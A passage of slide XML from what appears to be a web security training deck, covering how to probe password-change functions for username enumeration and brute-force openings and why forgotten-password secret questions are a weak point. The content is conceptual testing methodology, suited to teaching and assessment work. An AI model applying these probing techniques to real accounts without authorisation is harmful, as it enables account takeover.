            <a:pPr marL="374072" indent="-374072">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr sz="3000"/>
            </a:pPr>
            <a:r>
              <a:t>Make various requests to the password change function, using invalid usernames, invalid existing passwords, and mismatched “new password” and “confirm new password” values.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="374072" indent="-374072">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr sz="3000"/>
            </a:pPr>
            <a:r>
              <a:t>Try to identify any behavior that can be used for username enumeration or brute-force attacks</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0" name="Forgotten Password Functionality"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1557366" y="1162783"/>
            <a:ext cx="9906125" cy="1710202"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="859536">
              <a:defRPr sz="5076"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Forgotten Password Functionality</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1451" name="Design weaknesses in forgotten password functions frequently make this the weakest link at which to attack the application’s overall authentication logic.…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2080767" y="3014054"/>
            <a:ext cx="8812666" cy="5125421"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="384048" indent="-384048">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="2800"/>
            </a:pPr>
            <a:r>
              <a:t>Design weaknesses in forgotten password functions frequently make this the weakest link at which to attack the application’s overall authentication logic. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="384048" indent="-384048">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="2800"/>
            </a:pPr>
            <a:r>
              <a:t>Often involves secondary challenge such as questions about mothers’ maiden names, memorable dates, favorite colors, and the like will generally have a much smaller set of potential answers than the set of possible passwords.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="384048" indent="-384048">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:defRPr sz="2800"/>
            </a:pPr>
            <a:r>
              <a:t>This challenge is often much easier for an attacker to respond to than attempting to guess the user’s password</a:t>
            </a:r>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